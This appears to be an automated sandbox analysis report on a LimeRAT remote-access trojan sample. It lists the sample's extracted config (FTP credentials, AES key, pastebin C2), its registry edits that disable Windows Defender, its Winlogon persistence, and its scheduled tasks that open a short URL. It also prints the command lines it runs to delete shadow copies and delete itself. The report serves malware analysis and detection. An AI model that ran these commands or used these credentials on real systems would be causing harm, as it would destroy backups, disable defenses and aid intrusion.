Analysis
max time kernel: 1799s
max time network: 1803s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 26-04-2024 19:22
Behavioral task
behavioral1
Sample
Client.exe
Resource
win11-20240426-en
General
Target: Client.exe
Size: 252KB
MD5: 7746b64cfda991754c277e8dbfcb12bf
SHA1: f3d05a15cf7c4f1d07bca938076cb53df9c39e16
SHA256: ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
SHA512: 04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
SSDEEP: 6144:tEIE/UVPy/oCa+LDZWC9z589b2vknq1dis4N:iIzPygCa+DZQnq1cP
Malware Config
Extracted
Protocol: ftp
Host: ftp.encompossoftware.com
Port: 21
Username: remoteuser
Password: Encomposx99
Extracted
limerat
False
aes_key: adminsigma5214881939pashalko
antivm: false
c2_url: https://pastebin.com/raw/DDTVwwbu
download_payload: false
install: true
install_name: MIcrosoft Teams.exe
main_folder: True
payload_url: True
pin_spread: true
sub_folder: False
usb_spread: true
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
- resource: behavioral1/memory/5068-0-0x0000024A54500000-0x0000024A54544000-memory.dmp, yara_rule: disable_win_def
- resource: behavioral1/files/0x0005000000025ccc-24.dat, yara_rule: disable_win_def
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes: Client.exe, AdminMIcrosoft TeamsMIcrosoft Teams.exe
- Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\"" (Client.exe)
- Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\"" (AdminMIcrosoft TeamsMIcrosoft Teams.exe)
Modifies Windows Defender Real-time Protection settings
Processes: Client.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection (Client.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" (Client.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" (Client.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" (Client.exe)
Modifies security service 2 TTPs 1 IoCs
Processes: Client.exe
- Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" (Client.exe)
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
Processes: AdminMIcrosoft TeamsMIcrosoft Teams.exe
- PID 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: vssadmin.exe (9 instances)
- File opened (read-only) \??\D: (vssadmin.exe)
- File opened (read-only) \??\H: (vssadmin.exe)
- File opened (read-only) \??\G: (vssadmin.exe)
- File opened (read-only) \??\H: (vssadmin.exe)
- File opened (read-only) \??\F: (vssadmin.exe)
- File opened (read-only) \??\F: (vssadmin.exe)
- File opened (read-only) \??\g: (vssadmin.exe)
- File opened (read-only) \??\e: (vssadmin.exe)
- File opened (read-only) \??\g: (vssadmin.exe)
- File opened (read-only) \??\E: (vssadmin.exe)
- File opened (read-only) \??\G: (vssadmin.exe)
- File opened (read-only) \??\h: (vssadmin.exe)
- File opened (read-only) \??\E: (vssadmin.exe)
- File opened (read-only) \??\h: (vssadmin.exe)
- File opened (read-only) \??\e: (vssadmin.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Network flows:
- flow 10: pastebin.com
- flow 11: pastebin.com
- flow 12: pastebin.com
- flow 1: iplogger.org
- flow 1: pastebin.com
- flow 2: iplogger.org
- flow 4: pastebin.com
- flow 6: pastebin.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (5 instances)
- PID 1372 schtasks.exe
- PID 3268 schtasks.exe
- PID 4952 schtasks.exe
- PID 2116 schtasks.exe
- PID 1240 schtasks.exe
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (12 instances)
- PID 3252 vssadmin.exe
- PID 3668 vssadmin.exe
- PID 896 vssadmin.exe
- PID 2280 vssadmin.exe
- PID 2580 vssadmin.exe
- PID 2076 vssadmin.exe
- PID 3308 vssadmin.exe
- PID 3036 vssadmin.exe
- PID 4024 vssadmin.exe
- PID 3928 vssadmin.exe
- PID 2272 vssadmin.exe
- PID 2444 vssadmin.exe
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes: Client.exe, powershell.exe, AdminMIcrosoft TeamsMIcrosoft Teams.exe
- PID 5068 Client.exe
- PID 5068 Client.exe
- PID 5068 Client.exe
- PID 1300 powershell.exe
- PID 1300 powershell.exe
- PID 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe
- PID 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe
- PID 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes: Client.exe, powershell.exe, vssvc.exe, AdminMIcrosoft TeamsMIcrosoft Teams.exe
- Token: SeDebugPrivilege, PID 5068 Client.exe
- Token: SeDebugPrivilege, PID 1300 powershell.exe
- Token: SeBackupPrivilege, PID 3344 vssvc.exe
- Token: SeRestorePrivilege, PID 3344 vssvc.exe
- Token: SeAuditPrivilege, PID 3344 vssvc.exe
- Token: SeBackupPrivilege, PID 5068 Client.exe
- Token: SeSecurityPrivilege, PID 5068 Client.exe
- Token: SeBackupPrivilege, PID 5068 Client.exe
- Token: SeDebugPrivilege, PID 1716 AdminMIcrosoft TeamsMIcrosoft Teams.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: Client.exe, cmd.exe (13 instances)
Each row: description, source PID and process, target procid.
- PID 5068 wrote to memory of 1300 (5068 Client.exe, procid_target 82)
- PID 5068 wrote to memory of 1300 (5068 Client.exe, procid_target 82)
- PID 5068 wrote to memory of 840 (5068 Client.exe, procid_target 84)
- PID 5068 wrote to memory of 840 (5068 Client.exe, procid_target 84)
- PID 5068 wrote to memory of 1408 (5068 Client.exe, procid_target 85)
- PID 5068 wrote to memory of 1408 (5068 Client.exe, procid_target 85)
- PID 5068 wrote to memory of 1184 (5068 Client.exe, procid_target 86)
- PID 5068 wrote to memory of 1184 (5068 Client.exe, procid_target 86)
- PID 5068 wrote to memory of 3568 (5068 Client.exe, procid_target 87)
- PID 5068 wrote to memory of 3568 (5068 Client.exe, procid_target 87)
- PID 5068 wrote to memory of 1552 (5068 Client.exe, procid_target 89)
- PID 5068 wrote to memory of 1552 (5068 Client.exe, procid_target 89)
- PID 5068 wrote to memory of 416 (5068 Client.exe, procid_target 90)
- PID 5068 wrote to memory of 416 (5068 Client.exe, procid_target 90)
- PID 5068 wrote to memory of 3132 (5068 Client.exe, procid_target 92)
- PID 5068 wrote to memory of 3132 (5068 Client.exe, procid_target 92)
- PID 5068 wrote to memory of 1912 (5068 Client.exe, procid_target 93)
- PID 5068 wrote to memory of 1912 (5068 Client.exe, procid_target 93)
- PID 5068 wrote to memory of 1820 (5068 Client.exe, procid_target 94)
- PID 5068 wrote to memory of 1820 (5068 Client.exe, procid_target 94)
- PID 5068 wrote to memory of 5112 (5068 Client.exe, procid_target 95)
- PID 5068 wrote to memory of 5112 (5068 Client.exe, procid_target 95)
- PID 5068 wrote to memory of 2760 (5068 Client.exe, procid_target 96)
- PID 5068 wrote to memory of 2760 (5068 Client.exe, procid_target 96)
- PID 5068 wrote to memory of 2860 (5068 Client.exe, procid_target 97)
- PID 5068 wrote to memory of 2860 (5068 Client.exe, procid_target 97)
- PID 5068 wrote to memory of 3408 (5068 Client.exe, procid_target 98)
- PID 5068 wrote to memory of 3408 (5068 Client.exe, procid_target 98)
- PID 840 wrote to memory of 3036 (840 cmd.exe, procid_target 110)
- PID 840 wrote to memory of 3036 (840 cmd.exe, procid_target 110)
- PID 1912 wrote to memory of 3252 (1912 cmd.exe, procid_target 112)
- PID 1912 wrote to memory of 3252 (1912 cmd.exe, procid_target 112)
- PID 1408 wrote to memory of 1692 (1408 cmd.exe, procid_target 113)
- PID 1408 wrote to memory of 1692 (1408 cmd.exe, procid_target 113)
- PID 5112 wrote to memory of 4024 (5112 cmd.exe, procid_target 114)
- PID 5112 wrote to memory of 4024 (5112 cmd.exe, procid_target 114)
- PID 2760 wrote to memory of 896 (2760 cmd.exe, procid_target 115)
- PID 2760 wrote to memory of 896 (2760 cmd.exe, procid_target 115)
- PID 3408 wrote to memory of 3668 (3408 cmd.exe, procid_target 116)
- PID 3408 wrote to memory of 3668 (3408 cmd.exe, procid_target 116)
- PID 416 wrote to memory of 2444 (416 cmd.exe, procid_target 118)
- PID 416 wrote to memory of 2444 (416 cmd.exe, procid_target 118)
- PID 1184 wrote to memory of 2272 (1184 cmd.exe, procid_target 119)
- PID 1184 wrote to memory of 2272 (1184 cmd.exe, procid_target 119)
- PID 3568 wrote to memory of 2076 (3568 cmd.exe, procid_target 120)
- PID 3568 wrote to memory of 2076 (3568 cmd.exe, procid_target 120)
- PID 1552 wrote to memory of 2280 (1552 cmd.exe, procid_target 121)
- PID 1552 wrote to memory of 2280 (1552 cmd.exe, procid_target 121)
- PID 3132 wrote to memory of 3928 (3132 cmd.exe, procid_target 122)
- PID 3132 wrote to memory of 3928 (3132 cmd.exe, procid_target 122)
- PID 1820 wrote to memory of 2580 (1820 cmd.exe, procid_target 123)
- PID 1820 wrote to memory of 2580 (1820 cmd.exe, procid_target 123)
- PID 2860 wrote to memory of 3308 (2860 cmd.exe, procid_target 124)
- PID 2860 wrote to memory of 3308 (2860 cmd.exe, procid_target 124)
- PID 5068 wrote to memory of 1372 (5068 Client.exe, procid_target 125)
- PID 5068 wrote to memory of 1372 (5068 Client.exe, procid_target 125)
- PID 5068 wrote to memory of 3268 (5068 Client.exe, procid_target 126)
- PID 5068 wrote to memory of 3268 (5068 Client.exe, procid_target 126)
- PID 5068 wrote to memory of 4952 (5068 Client.exe, procid_target 127)
- PID 5068 wrote to memory of 4952 (5068 Client.exe, procid_target 127)
- PID 5068 wrote to memory of 2116 (5068 Client.exe, procid_target 128)
- PID 5068 wrote to memory of 2116 (5068 Client.exe, procid_target 128)
- PID 5068 wrote to memory of 1240 (5068 Client.exe, procid_target 129)
- PID 5068 wrote to memory of 1240 (5068 Client.exe, procid_target 129)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(Tree nesting shown by indentation; each entry gives image path, command line, PID and triggered signatures.)

C:\Users\Admin\AppData\Local\Temp\Client.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  PID: 5068
  - Modifies WinLogon for persistence
  - Modifies Windows Defender Real-time Protection settings
  - Modifies security service
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" Get-MpPreference -verbose
    PID: 1300
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin Delete Shadows /all /quiet
    PID: 840
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin Delete Shadows /all /quiet
      PID: 3036
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    PID: 1408
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      PID: 1692

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    PID: 1184
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      PID: 2272
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    PID: 3568
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      PID: 2076
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    PID: 1552
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      PID: 2280
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    PID: 416
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      PID: 2444
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    PID: 3132
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
      PID: 3928
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    PID: 1912
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      PID: 3252
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    PID: 1820
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
      PID: 2580
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    PID: 5112
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      PID: 4024
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    PID: 2760
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
      PID: 896
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    PID: 2860
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      PID: 3308
      - Enumerates connected drives
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c Vssadmin delete shadowstorage /all /quiet
    PID: 3408
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\vssadmin.exe
      Command line: Vssadmin delete shadowstorage /all /quiet
      PID: 3668
      - Interacts with shadow copies

  C:\Windows\SYSTEM32\schtasks.exe
    Command line: schtasks /create /f /st "20:17" /sc daily /mo "3" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
    PID: 1372
    - Creates scheduled task(s)

  C:\Windows\SYSTEM32\schtasks.exe
    Command line: schtasks /create /f /st "18:29" /sc daily /mo "5" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
    PID: 3268
    - Creates scheduled task(s)

  C:\Windows\SYSTEM32\schtasks.exe
    Command line: schtasks /create /f /st "09:53" /sc daily /mo "1" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
    PID: 4952
    - Creates scheduled task(s)

  C:\Windows\SYSTEM32\schtasks.exe
    Command line: schtasks /create /f /st "13:02" /sc weekly /mo "3" /d "Sun" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
    PID: 2116
    - Creates scheduled task(s)

  C:\Windows\SYSTEM32\schtasks.exe
    Command line: schtasks /create /f /st "05:01" /sc monthly /m "may" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
    PID: 1240
    - Creates scheduled task(s)

  C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    PID: 1852
    C:\Windows\system32\PING.EXE
      Command line: ping 0 -n 2
      PID: 1080
      - Runs ping.exe

  C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe
    Command line: "C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"
    PID: 1716
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 3344
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
(Counts are the number of matching signatures per technique.)
Persistence
- Boot or Logon Autostart Execution: 1
  - Winlogon Helper DLL: 1
- Create or Modify System Process: 2
  - Windows Service: 2
- Scheduled Task/Job: 1
Privilege Escalation
- Boot or Logon Autostart Execution: 1
  - Winlogon Helper DLL: 1
- Create or Modify System Process: 2
  - Windows Service: 2
- Scheduled Task/Job: 1
Defense Evasion
- Impair Defenses: 2
  - Disable or Modify Tools: 2
- Indicator Removal: 2
  - File Deletion: 2
- Modify Registry: 4
Downloads
File 1 (the submitted sample)
Filesize: 252KB
MD5: 7746b64cfda991754c277e8dbfcb12bf
SHA1: f3d05a15cf7c4f1d07bca938076cb53df9c39e16
SHA256: ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
SHA512: 04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
File 2
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82